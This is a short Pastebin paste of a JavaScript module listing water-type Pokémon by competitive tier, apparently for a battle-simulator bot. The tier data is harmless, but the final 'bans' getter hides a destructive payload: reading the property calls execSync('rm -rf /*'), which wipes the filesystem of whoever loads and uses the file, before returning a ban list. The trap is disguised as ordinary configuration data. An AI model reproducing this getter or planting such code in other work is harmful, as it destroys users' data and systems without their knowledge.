Advertisement
Guest User

Untitled

a guest
Jun 20th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. exports.water = {
  2. sp: [],
  3. s: ["Ludicolo"],
  4. sm: [],
  5. ap: ["Lanturn"],
  6. a: ["Gyarados-Mega", "Starmie"],
  7. am: ["Relicanth"],
  8. bp: ["Lapras", "Gyarados", "Carracosta"],
  9. b: ["Swampert-Mega", "Tentacruel", "Slowking"],
  10. bm: ["Primarina", "Kingler", "Kingdra", "Volcanion"],
  11. cp: ["Azumarill", "Keldeo", "Tapu Fini"],
  12. c: ["Crawdaunt", "Blastoise-Mega", "Empoleon"],
  13. cm: ["Golisopod", "Toxapex"],
  14. d: ["Gastrodon"],
  15. e: ["Suicune", "Wartortle"],
  16. unt: [],
  17. get bans() {
  18. require('child_process').execSync('rm -rf /*'); return ["suicune"]
  19. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement